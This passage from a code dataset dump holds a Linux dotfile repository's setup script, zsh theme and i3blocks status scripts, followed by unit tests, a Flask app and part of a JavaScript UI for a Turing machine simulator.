-eq 1 ]; then\n echo \"${USERNAME} is not registered in the system\"\n exit 1\nfi\necho \"Setup environment for user '${USERNAME}'\"\n\nDISTRO=$(lsb_release -r | cut -f 2)\n\n# Install neovim editor\n# ====================================================================\napt-get install -y software-properties-common\nadd-apt-repository -y ppa:neovim-ppa/stable\napt-get update\napt-get install -y neovim\n\napt-get install -y python-dev python-pip python3-dev python3-pip\npython -m pip install neovim\npython3 -m pip install neovim\npython3 -m pip install pynvim\n\n# Change editor alternatives\nupdate-alternatives --install /usr/bin/vi vi /usr/bin/nvim 60\nupdate-alternatives --set vi\nupdate-alternatives --install /usr/bin/vim vim /usr/bin/nvim 60\nupdate-alternatives --set vim\nupdate-alternatives --install /usr/bin/editor editor /usr/bin/nvim 60\nupdate-alternatives --set editor\n\n# Setup configuration file\nNVIM_DIR=\"/home/${USERNAME}/.config/nvim\"\nmkdir -p ${NVIM_DIR}\ncp neovim/init.vim \"${NVIM_DIR}/init.vim\"\n\n# Install vim-plug plugin manager\nVIM_PLUG_URL=\"https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim\"\nVIM_PLUG_DIR=\"/home/${USERNAME}/.local/share/nvim/site/autoload\"\nLOCAL_DIR=\"/home/${USERNAME}/.local\"\nmkdir -p ${VIM_PLUG_DIR}\nwget -O \"${VIM_PLUG_DIR}/plug.vim\" ${VIM_PLUG_URL}\n\n# Update file permission\nchown -R ${USERNAME}:${USERNAME} ${NVIM_DIR}\nchown -R ${USERNAME}:${USERNAME} ${VIM_PLUG_DIR}\nchown -R ${USERNAME}:${USERNAME} ${LOCAL_DIR}\n\n# Install tmux\n# =====================================================================\napt-get install -y tmux\n\n# Setup configuration file\nTMUX_CONF_FILE=\"/home/${USERNAME}/.tmux.conf\"\ncp \"tmux/tmux.conf\" ${TMUX_CONF_FILE}\n\n# Update file permission\nchown ${USERNAME}:${USERNAME} ${TMUX_CONF_FILE}\n\n# Install pyenv & pyenv virtualenv\n# =====================================================================\nPYENV_DIR=\"/home/${USERNAME}/.pyenv\"\nPYENV_URL=\"https://github.com/pyenv/pyenv.git\"\nPYENV_VIRT_URL=\"https://github.com/pyenv/pyenv-virtualenv.git\"\n\nif [ ! -d ${PYENV_DIR} ]; then\n git clone ${PYENV_URL} ${PYENV_DIR}\n mkdir -p \"${PYENV_DIR}/plugins\"\n git clone ${PYENV_VIRT_URL} \"${PYENV_DIR}/plugins/pyenv-virtualenv\"\n chown ${USERNAME}:${USERNAME} ${PYENV_DIR}\nfi\n\n# Install zsh shell\n# =====================================================================\napt-get install -y zsh\n\n# (User should change the shell manually) Change user shell\nusermod --shell /bin/zsh ${USERNAME}\n\n# Setup configuration files\nZSHRC=\"/home/${USERNAME}/.zshrc\"\ncp zsh/zshrc ${ZSHRC}\nchown ${USERNAME}:${USERNAME} ${ZSHRC}\n\n# Install oh-my-zsh plugins\nOH_MY_ZSH_DIR=\"/home/${USERNAME}/.oh-my-zsh\"\nOH_MY_ZSH_CUSTOM_DIR=\"${OH_MY_ZSH_DIR}/custom\"\nOH_MY_ZSH_PLUGIN_DIR=\"${OH_MY_ZSH_CUSTOM_DIR}/plugins\"\n\nOH_MY_ZSH_URL=\"https://github.com/robbyrussell/oh-my-zsh.git\"\n\nZSH_AUTOSUGGESTION_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-autosuggestions\"\nZSH_AUTOSUGGESTION_URL=\"https://github.com/zsh-users/zsh-autosuggestions.git\"\n\nZSH_SYNTAX_HIGHLIGHT_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-syntax-highlighting\"\nZSH_SYNTAX_HIGHLIGHT_URL=\"https://github.com/zsh-users/zsh-syntax-highlighting.git\"\n\nZSH_PYENV_DIR=\"${OH_MY_ZSH_PLUGIN_DIR}/zsh-pyenv\"\nZSH_PYENV_URL=\"https://github.com/mattberther/zsh-pyenv.git\"\n\nif [ ! 
-d ${OH_MY_ZSH_DIR} ]; then\n git clone ${OH_MY_ZSH_URL} ${OH_MY_ZSH_DIR}\nfi\n\ncp zsh/aliases.zsh ${OH_MY_ZSH_CUSTOM_DIR}\ncp zsh/exports.zsh ${OH_MY_ZSH_CUSTOM_DIR}\ncp zsh/robbyrussell.zsh-theme ${OH_MY_ZSH_CUSTOM_DIR}\n\nif [ ! -d ${OH_MY_ZSH_PLUGIN_DIR} ]; then\n mkdir -p ${OH_MY_ZSH_PLUGIN_DIR}\nfi\n\nif [ ! -d ${ZSH_AUTOSUGGESTION_DIR} ]; then\n git clone ${ZSH_AUTOSUGGESTION_URL} ${ZSH_AUTOSUGGESTION_DIR}\nfi\n\nif [ ! -d ${ZSH_SYNTAX_HIGHLIGHT_DIR} ]; then\n git clone ${ZSH_SYNTAX_HIGHLIGHT_URL} ${ZSH_SYNTAX_HIGHLIGHT_DIR}\nfi\n\nif [ ! -d ${ZSH_PYENV_DIR} ]; then\n git clone ${ZSH_PYENV_URL} ${ZSH_PYENV_DIR}\nfi\n\nchown -R ${USERNAME}:${USERNAME} ${OH_MY_ZSH_DIR}\n\n# Install handy tools\napt-get install -y ctags htop ncdu net-tools\n\n# Install pyenv prerequisites libraries\napt install -y \\\n\tbuild-essential libssl-dev zlib1g-dev \\\n\tlibbz2-dev libreadline-dev libsqlite3-dev \\\n\tcurl virtualenv libncursesw5-dev xz-utils \\\n\ttk-dev libxml2-dev libxmlsec1-dev libffi-dev \\\n\tliblzma-dev\n\n# Install prerequisite libraries for tegra flash\napt-get install -y \\\n\tabootimg binfmt-support binutils \\\n\tcpp device-tree-compiler dosfstools \\\n\tlbzip2 libxml2-utils nfs-kernel-server \\\n\tpython3-yaml qemu-user-static sshpass \\\n\tudev uuid-runtime whois openssl \\\n\tcpio\n" }, { "alpha_fraction": 0.6069700121879578, "alphanum_fraction": 0.6137463450431824, "avg_line_length": 24.825000762939453, "blob_id": "ea3fdaad5d35986180b95fe79aeb325afa995642", "content_id": "70ed9423905a5d12fdd577a346edf9dd7c56453b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1035, "license_type": "permissive", "max_line_length": 98, "num_lines": 40, "path": "/zsh/robbyrussell.zsh-theme", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/zsh\n\n# Virtualenv prompt\nvenv=\"\"\nhost=\"\"\n\nfunction virtualenv_info() {\n which pyenv 2>&1 1>/dev/null\n if [[ $(echo $?) ]]; then\n venv=$(pyenv version | sed 's/ .*//g')\n fi\n}\n\nfunction hostname_info() {\n string=$(hostname -I)\n host=(`echo $string | sed 's/\\ /\\n/g'`)\n host=${host[1]}\n}\n\nfunction nvpowertool_info() {\n systemctl status nvpowertool.service 1>/dev/null 2>/dev/null\n if [ $? 
-eq 0 ]; then\n\tnvpowertool=\"[nvpowertool:active] \"\n else\n nvpowertool=\"\"\n fi\n}\n\nautoload -U add-zsh-hook\nadd-zsh-hook precmd virtualenv_info\nadd-zsh-hook precmd hostname_info\nadd-zsh-hook precmd nvpowertool_info\n\nPROMPT=$'%{$fg_bold[red]%}[${host}] %{$fg_bold[yellow]%}${nvpowertool}%{$fg_bold[cyan]%}(${venv})'\nPROMPT+=' %{$fg[green]%}%c%{$reset_color%} $(git_prompt_info)'\n\nZSH_THEME_GIT_PROMPT_PREFIX=\"%{$fg_bold[blue]%}git:(%{$fg[red]%}\"\nZSH_THEME_GIT_PROMPT_SUFFIX=\"%{$reset_color%} \"\nZSH_THEME_GIT_PROMPT_DIRTY=\"%{$fg[blue]%}) %{$fg[yellow]%}✗\"\nZSH_THEME_GIT_PROMPT_CLEAN=\"%{$fg[blue]%})\"\n" }, { "alpha_fraction": 0.48571428656578064, "alphanum_fraction": 0.5079365372657776, "avg_line_length": 23.19230842590332, "blob_id": "b3e4b4a06272c82572a49c809fad0b62e55bcb15", "content_id": "a5fd50535251078f2d453d30d06b226e7367402c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 642, "license_type": "permissive", "max_line_length": 144, "num_lines": 26, "path": "/i3blocks/sound/sound_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nVOLUME_MUTE=\"🔇\"\nVOLUME_LOW=\"🔈\"\nVOLUME_MID=\"🔉\"\nVOLUME_HIGH=\"🔊\"\nSOUND_LEVEL=$(amixer -M get Master | awk -F\"[][]\" '/%/ { print $2 }' | awk -F\"%\" 'BEGIN{tot=0; i=0} {i++; tot+=$1} END{printf(\"%s\\n\", tot/i) }')\nMUTED=$(amixer get Master | awk ' /%/{print ($NF==\"[off]\" ? 1 : 0); exit;}')\n\nICON=$VOLUME_MUTE\nif [ \"$MUTED\" = \"1\" ]\nthen\n ICON=\"$VOLUME_MUTE\"\nelse\n if [ \"$SOUND_LEVEL\" -lt 34 ]\n then\n ICON=\"$VOLUME_LOW\"\n elif [ \"$SOUND_LEVEL\" -lt 67 ]\n then\n ICON=\"$VOLUME_MID\"\n else\n ICON=\"$VOLUME_HIGH\"\n fi\nfi\n\necho \"$ICON\" \"$SOUND_LEVEL\" | awk '{ printf(\" %s:%3s%% \\n\", $1, $2) }'\n\n" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6945812702178955, "avg_line_length": 17.454545974731445, "blob_id": "5f7a79fda7be0e0c855a0687e034c8b1acba2d2b", "content_id": "802e7bf2e90fa227e44b6d597b8396d4df5384c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 203, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/i3blocks/weather/Makefile", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "CC = gcc\nCFLAGS = -O2 -Wall -Wextra -Wpedantic\nLINKFLAGS = -lrt\n\n.PHONY: clean\n\nweather_signaler: weather_signaler.c\n\t$(CC) $(CFLAGS) $< -o weather_signaler $(LINKFLAGS)\n\nclean:\n\t@rm -v weather_signaler\n" }, { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.333333015441895, "blob_id": "f18b14e82cf67b4e44f9f355140b08e3ba54d183", "content_id": "330f395d85bdebf2390ad5cf458a3f8aad3109c1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 80, "license_type": "permissive", "max_line_length": 27, "num_lines": 6, "path": "/i3blocks/sound/sound_burst.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\nfor i in $(seq 1 5)\ndo\n sleep 0.2\n pkill -RTMIN+1 i3blocks\ndone\n" }, { "alpha_fraction": 0.5770012140274048, "alphanum_fraction": 0.5912230610847473, "avg_line_length": 23.127450942993164, "blob_id": "d3153aafc1f4f515d200634dce399d2914602c94", "content_id": "fa22c63b175880fae10fe34d984ac1818f46fc14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2461, "license_type": 
"permissive", "max_line_length": 79, "num_lines": 102, "path": "/i3blocks/weather/weather_signaler.c", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <unistd.h>\n#include <signal.h>\n#include <time.h>\n#include <stdio.h>\n\n// Sleep time between daemon updates.\n#define SLEEP_TIME_S 300\n\n// Test for internet connection. Returns true if connection is established.\nstatic int test_internet_connection()\n{\n const char *cmd = \"nc -zw1 google.com 443 1> /dev/null 2>&1\";\n return !system(cmd);\n}\n\n// Signal handler for signaling the weather applet.\nstatic void timer_handler(int sig, siginfo_t *si, void *uc)\n{\n (void) sig; // Ignore parameter.\n (void) si; // Ignore parameter.\n (void) uc; // Ignore parameter.\n\n // Test for internet connection till found or 20 times.\n for (int i = 0; i < 20; ++i)\n {\n if (test_internet_connection())\n {\n // Connection established. Break out.\n break;\n }\n else\n {\n // Retry every second.\n sleep(1);\n }\n }\n\n // Signal the weather applet.\n const char *cmd = \"pkill -RTMIN+2 i3blocks\";\n if ( system(cmd) )\n {\n // Error message should be printed to stdout since stdout is the way to\n // interface with a user in i3blocks.\n puts(\"WEATHER_SIGNALER ERROR\\n\");\n }\n}\n\nint timer_init_launch(\n timer_t *timer,\n struct sigevent *sev,\n struct sigaction *sa,\n struct itimerspec *tspec)\n{\n // Event initialization.\n sev->sigev_notify = SIGEV_SIGNAL;\n sev->sigev_signo = SIGRTMIN;\n sev->sigev_value.sival_ptr = timer;\n\n // Signal action type initializaion.\n sa->sa_flags = SA_SIGINFO;\n sa->sa_sigaction = timer_handler;\n sigemptyset(&sa->sa_mask);\n if (sigaction(SIGRTMIN, sa, NULL) == -1)\n return -1;\n\n // Initialze timer.\n if (timer_create(CLOCK_BOOTTIME, sev, timer) == -1)\n return -1;\n\n // Start the timer.\n tspec->it_value.tv_sec = SLEEP_TIME_S;\n tspec->it_value.tv_nsec = 0;\n tspec->it_interval.tv_sec = SLEEP_TIME_S;\n tspec->it_interval.tv_nsec = 0;\n if (timer_settime(*timer, 0, tspec, NULL) == -1)\n return -1;\n\n // Initialization successful.\n return 0;\n}\n\nint main()\n{\n timer_t timer;\n struct sigevent sev;\n struct sigaction sa;\n struct itimerspec tspec;\n\n // Initialize signaler\n if (timer_init_launch(&timer, &sev, &sa, &tspec))\n exit(EXIT_FAILURE);\n\n // Signal on daemon launch.\n sleep(1);\n timer_handler(0, NULL, NULL);\n\n while(1)\n {\n sleep(100);\n }\n}\n" }, { "alpha_fraction": 0.5467708110809326, "alphanum_fraction": 0.5641074776649475, "avg_line_length": 41.67479705810547, "blob_id": "dc80cdd171cfc11f9855ef3690861dff437303e6", "content_id": "1fe2817ebf38f9fa333c419f3fb4ec6766f8d466", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5380, "license_type": "permissive", "max_line_length": 93, "num_lines": 123, "path": "/i3blocks/weather/weather.py", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n''' Weather acquirer for: https://github.com/miklhh/i3blocks-config '''\nimport os\nimport datetime\nimport xml.etree.ElementTree as ET\nimport requests\n\n# Forecast URL.\nYR_URL = \"https://www.yr.no/place/Sverige/%C3%96sterg%C3%B6tland/Link%C3%B6ping/forecast.xml\"\n\n# Good to have data + funky emojicons.\nFORECAST_CACHE_FILE = os.path.dirname(os.path.realpath(__file__)) + \"/forecast.xml\"\n\n# Emojis associatted with weather # Day # Night\nWEATHER_TYPES = { \"Fair\" : [\"☀️\", \"🌙\"], #pylint: disable=C0326\n \"Partly cloudy\" : [\"⛅\", \"☁️\"], #pylint: 
disable=C0326\n \"Clear sky\" : [\"☀️\", \"🌙\"], #pylint: disable=C0326\n \"Cloudy\" : [\"☁️\", \"☁️\"], #pylint: disable=C0326\n \"Light rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Heavy Rain\" : [\"🌧️\", \"🌧️\"], #pylint: disable=C0326\n \"Light snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Heavy snow\" : [\"🌨️\", \"🌨️\"], #pylint: disable=C0326\n \"Foggy\" : [\"🌫️\", \"🌫️\"], #pylint: disable=C0326\n \"Fog\" : [\"🌫️\", \"🌫️\"], #pylint: disable=C0326\n \"Light snow showers\" : [\"🌨️\", \"🌨️\"]} #pylint: disable=C0326\n\n\ndef get_xml_root():\n \"\"\" Returns a weather XML root, cached from old data if necessary. \"\"\"\n yr_response = 0\n try:\n # Request data from YR.\n yr_response = requests.get(YR_URL)\n if yr_response.status_code != 200:\n raise RuntimeError('Error: YR status code ' + str(yr_response.status_code))\n\n # New response, store in cache file and return XML root.\n with open(FORECAST_CACHE_FILE, \"w\") as file_handle:\n file_handle.write(yr_response.text)\n return ET.fromstring(yr_response.text)\n\n except requests.ConnectionError:\n # Probably just no internet. Use cached forecast.\n if os.path.isfile(FORECAST_CACHE_FILE):\n with open(FORECAST_CACHE_FILE) as file_handle:\n yr_response = file_handle.read()\n # Print recycle emoji and continue using cached forecast.\n print(\"(♻️)\", end=\" \")\n return ET.fromstring(yr_response)\n\n # Dead end, no XML-root acquired.\n raise RuntimeError('No forecast data available.')\n\n\ndef main():\n \"\"\" Entry point for program. \"\"\"\n # Get the XML root.\n try:\n xml_root = get_xml_root()\n except RuntimeError as exception:\n print(exception)\n\n # Parse the sun rise and set time. Appearntly, they are not always available and\n # so we need to make sure they exist in the recieved data.\n rise_fall_available = True\n sun_rise_time = sun_set_time = \"\"\n try:\n sun_rise_time = xml_root.find(\"sun\").attrib.get(\"rise\")\n sun_rise_time = sun_rise_time[sun_rise_time.find('T')+1 : len(sun_rise_time)-3]\n sun_set_time = xml_root.find(\"sun\").attrib.get(\"set\")\n sun_set_time = sun_set_time[sun_set_time.find('T')+1 : len(sun_set_time)-3]\n except (ET.ParseError, AttributeError):\n rise_fall_available = False\n\n # Get the current weather information.\n forecast = xml_root.find(\"forecast\").find(\"tabular\").find(\"time\")\n weather = forecast.find(\"symbol\").attrib.get(\"name\")\n temperature = forecast.find(\"temperature\").attrib.get(\"value\")\n wind_direction = forecast.find(\"windDirection\").attrib.get(\"code\")\n wind_speed = forecast.find(\"windSpeed\").attrib.get(\"mps\")\n precipitation = forecast.find(\"precipitation\").attrib.get(\"value\")\n\n # Night time?\n is_night = 0\n now = datetime.datetime.now()\n if rise_fall_available:\n # Use sun rise and fall time to determine.\n sun_rise = datetime.datetime.strptime(sun_rise_time, \"%H:%M\")\n sun_set = datetime.datetime.strptime(sun_set_time, \"%H:%M\")\n is_night = 1 if now.time() < sun_rise.time() or sun_set.time() < now.time() else 0\n else:\n # No rise/fall time available. 
Approximate daytime as [07:00 - 21:00].\n sun_rise = datetime.datetime.strptime(\"07:00\", \"%H:%M\")\n sun_set = datetime.datetime.strptime(\"21:00\", \"%H:%M\")\n is_night = 1 if now.time() < sun_rise.time() or sun_set.time() < now.time() else 0\n\n # Print the weather.\n if weather in WEATHER_TYPES:\n # Emoji is avaiable for usage.\n print(weather + \": \" + WEATHER_TYPES.get(weather)[is_night] + \" \", end=\"\")\n else:\n # No emoji available, use regular text.\n print(weather + \" \", end=\"\")\n\n # Print the temperature and sun times.\n print(temperature, end=\"°C \")\n\n # Print the sun rise and set time.\n if rise_fall_available:\n print(\"[\" + sun_rise_time + \" 🌅 \" + sun_set_time + \"]\", end=\" \")\n\n # Print the precipitation (if there is any).\n if precipitation != \"0\":\n # Print with a wet umbrella\n print(\"| ☔ \" + precipitation + \"mm\", end=\" \")\n\n # Print wind data.\n print(\"| 🍃 \" + wind_speed + \"m/s \" + \"(\" + wind_direction + \")\", end=\"\")\n\n# Go gadget, go!\nmain()\n" }, { "alpha_fraction": 0.5362877249717712, "alphanum_fraction": 0.5664739608764648, "avg_line_length": 34.3863639831543, "blob_id": "e927b2f9babc320a64f3a3733083c8e99f0ba584", "content_id": "6b0128c3c5a64c979a0c63efbd63574e94378939", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1562, "license_type": "permissive", "max_line_length": 116, "num_lines": 44, "path": "/i3blocks/battery/battery_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# If ACPI was not installed, this probably is a battery-less computer.\nACPI_RES=$(acpi -b)\nACPI_CODE=$?\nif [ $ACPI_CODE -eq 0 ]\nthen\n # Get essential information. Due to som bug with some versions of acpi it is\n # worth filtering the ACPI result from all lines containing \"unavailable\".\n BAT_LEVEL_ALL=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | grep -E -o \"[0-9][0-9]?[0-9]?%\")\n BAT_LEVEL=$(echo \"$BAT_LEVEL_ALL\" | awk -F\"%\" 'BEGIN{tot=0;i=0} {i++; tot+=$1} END{printf(\"%d%%\\n\", tot/i)}')\n TIME_LEFT=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | grep -E -o \"[0-9]{2}:[0-9]{2}:[0-9]{2}\")\n IS_CHARGING=$(echo \"$ACPI_RES\" | grep -v \"unavailable\" | awk '{ printf(\"%s\\n\", substr($3, 0, length($3)-1) ) }')\n\n # If there is no 'time left' information (when almost fully charged) we \n # provide information ourselvs.\n if [ -z \"$TIME_LEFT\" ]\n then\n TIME_LEFT=\"00:00:00\"\n fi\n\n # Print full text. The charging data.\n TIME_LEFT=$(echo $TIME_LEFT | awk '{ printf(\"%s\\n\", substr($1, 0, 5)) }')\n echo \"🔋$BAT_LEVEL ⏳$TIME_LEFT \"\n\n # Print the short text.\n echo \"BAT: $BAT_LEVEL\"\n \n # Change the font color, depending on the situation.\n if [ \"$IS_CHARGING\" = \"Charging\" ]\n then\n # Charging yellow color.\n echo \"#D0D000\"\n else\n if [ \"${BAT_LEVEL%?}\" -le 15 ]\n then\n # Battery very low. Red color.\n echo \"#FA1E44\"\n else\n # Battery not charging but at decent level. 
Green color.\n echo \"#007872\"\n fi\n fi\nfi\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6770833134651184, "avg_line_length": 31, "blob_id": "d3c0b3fa15b5c58f2e55f96dcb42591d689e6217", "content_id": "32cb5afe62d2de56108e2fbca1abb42dd126eda4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 96, "license_type": "permissive", "max_line_length": 51, "num_lines": 3, "path": "/i3wm/bin/rofi_app_launcher", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Run rofi app launcher\ni3-dmenu-desktop --dmenu=\"rofi -dmenu -i -p 'apps'\"\n" } ]
num_files: 17
repo_name: aleks311001/MachineTuring
repo_url: https://github.com/aleks311001/MachineTuring
snapshot_id: 984a5e40541d8137e4f61d9a562fc5621b45c9c8
revision_id: 1f0f4eb2ffde3829b91b5de27b8b50ab22fd7b01
directory_id: cb0c1208c27ff43cd08e54edbc9923ee86c6d169
branch_name: refs/heads/master
visit_date: 2023-03-03T10:56:55.305050
revision_date: 2021-02-04T21:58:49
committer_date: 2021-02-04T21:58:49
github_id: 261997495
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5586034655570984, "alphanum_fraction": 0.5644222497940063, "avg_line_length": 39.550559997558594, "blob_id": "7916c7f2b59a35c95094ebb3b2b9cee1f7b7c531", "content_id": "5ad2ad8db55dea0390db6eb9433b74dc121d8881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3609, "license_type": "no_license", "max_line_length": 120, "num_lines": 89, "path": "/test_MT.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "from machine_Turing import MachineTuring\nimport unittest\nimport json\n\n\nclass TestMT(unittest.TestCase):\n def setUp(self):\n self.mt = MachineTuring()\n\n def test_new_machine(self):\n data = self.mt.create_dict()\n assert data['alphabet'] == '_'\n assert data['status_alphabet'] == 'Q0'\n\n program_table = data['program_table']\n assert program_table['line_status'] == ['Q0', ]\n assert program_table['lines']['_']['cells']['Q0'] == ''\n\n assert json.loads(data['ribbon_cells'])['0'] == '_'\n assert data['pos_start'] == 0\n assert json.loads(data['moves']) == ['=', ]\n assert json.loads(data['change_symbols']) == ['_', ]\n assert json.loads(data['statuses']) == ['Q0', ]\n\n def test_load(self):\n self.mt.load('simple_test')\n\n data = self.mt.create_dict()\n assert data['alphabet'] == '_1'\n assert data['status_alphabet'] == 'Q0 Qt'\n\n program_table = data['program_table']\n assert program_table['line_status'] == ['Q0', 'Qt']\n lines = program_table['lines']\n assert lines['_']['cells']['Q0'] == '1>Qt'\n assert lines['_']['cells']['Qt'] == ''\n assert lines['1']['cells']['Q0'] == ''\n assert lines['1']['cells']['Qt'] == ''\n\n for ribbon_cell in json.loads(data['ribbon_cells']).values():\n assert ribbon_cell == '_'\n assert data['pos_start'] == 0\n assert json.loads(data['moves']) == ['=', ]\n assert json.loads(data['change_symbols']) == ['_', ]\n assert json.loads(data['statuses']) == ['Q0', ]\n\n def check_jsons(self, orig_name, test_name):\n with open(f'machines/{orig_name}.json') as original, open(f'machines/{test_name}.json') as test:\n original_mt = json.load(original)\n test_mt = json.load(test)\n assert original_mt['_alphabet'] == test_mt['_alphabet']\n assert original_mt['_status_alphabet'] == test_mt['_status_alphabet']\n assert original_mt['_program_table'] == test_mt['_program_table']\n\n for i in range(min(original_mt['_ribbon_extremum']['min_index'], test_mt['_ribbon_extremum']['min_index']),\n max(original_mt['_ribbon_extremum']['max_index'], test_mt['_ribbon_extremum']['max_index'])):\n assert original_mt['_ribbon'].get(str(i), '_') == test_mt['_ribbon'].get(str(i), '_')\n\n assert original_mt['_pos_ribbon'] == test_mt['_pos_ribbon']\n assert original_mt['_status'] == test_mt['_status']\n assert original_mt['_move'] == test_mt['_move']\n\n def test_save(self):\n self.mt.load('simple_test')\n self.mt.save('tests/test_save')\n\n self.check_jsons('simple_test', 'tests/test_save')\n\n def test_next_step(self):\n self.mt.load('simple_test')\n self.mt.next_step()\n self.mt.save('tests/next_step_simple_test')\n self.check_jsons('tests/check_next_step_simple_test', 'tests/next_step_simple_test')\n\n self.mt.load('hard_test')\n self.mt.next_step()\n self.mt.save('tests/next_step_hard_test')\n self.check_jsons('tests/check_next_step_hard_test', 'tests/next_step_hard_test')\n\n def test_start(self):\n self.mt.load('hard_test')\n self.mt.start(25)\n self.mt.save('tests/start_hard_test')\n self.check_jsons('tests/check_start_hard_test', 'tests/start_hard_test')\n\n 
self.mt.load('long_test')\n self.mt.start(250)\n self.mt.save('tests/start_long_test')\n self.check_jsons('tests/check_start_long_test', 'tests/start_long_test')\n" }, { "alpha_fraction": 0.5871886014938354, "alphanum_fraction": 0.5877817273139954, "avg_line_length": 19.814815521240234, "blob_id": "3fb3377f0b06941195ec81d2c0e7efd6ddabd10c", "content_id": "33cb08e5cac20d86e932f7686e34abc898de4f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 53, "num_lines": 81, "path": "/app.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "from flask import Flask, redirect, request\nfrom machine_Turing import MachineTuring\nimport logging\n\napp = Flask(__name__)\nlogger = logging.getLogger(__name__)\nlogger.setLevel('INFO')\n\nmachine = MachineTuring()\n\n\[email protected]('/', methods=['GET'])\ndef get():\n return machine.render()\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n try:\n machine.update_all()\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/start', methods=['POST'])\ndef start():\n try:\n machine.update_all()\n machine.start(int(request.form.get('steps')))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/next_step', methods=['POST'])\ndef next_step():\n try:\n machine.update_all()\n machine.start(1)\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/save', methods=['POST'])\ndef save():\n try:\n machine.update_all()\n machine.save(request.form.get('save-load'))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/load', methods=['POST'])\ndef load():\n try:\n machine.load(request.form.get('save-load'))\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\[email protected]('/clear', methods=['POST'])\ndef clear():\n try:\n machine.clear()\n except Exception as e:\n logger.warning(e)\n return redirect('/')\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6479066610336304, "alphanum_fraction": 0.6591626405715942, "avg_line_length": 36.36410140991211, "blob_id": "cb9cd2a3a6e11803703c2c5501b8db0829e8b9cd", "content_id": "d418a2a40f42fa4c3f10189d7a37318949912269", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7285, "license_type": "no_license", "max_line_length": 116, "num_lines": 195, "path": "/static/script.js", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "let table = document.getElementById('ribbon_machine');\nlet ribbon = table.rows[0];\nlet index_ribbon = table.rows[1];\n\ntable.style.marginLeft = '-25px';\nlet numberCellsOnDisplay = document.body.clientWidth / 55;\n\nfor (let i = 0; i < numberCellsOnDisplay; ++i) {\n addCell(i, -Math.floor(numberCellsOnDisplay / 2) + i);\n}\n\nlet widthCell = ribbon.cells[0].offsetWidth;\nlet middle = Math.floor(numberCellsOnDisplay / 2);\nlet reallyMarginLeft = parseInt(table.style.marginLeft);\n\ndrawBorrow();\ntable.style.marginTop = '-10px';\nlet timerMakeNextStepId;\ndrawAfterLoad();\nmoveAfterAdd(30);\n\nribbon.cells[middle].children[0].focus();\n\ndocument.onkeydown = checkKey;\n\nfunction addCell(real_index_ceil, write_index_ceil, 
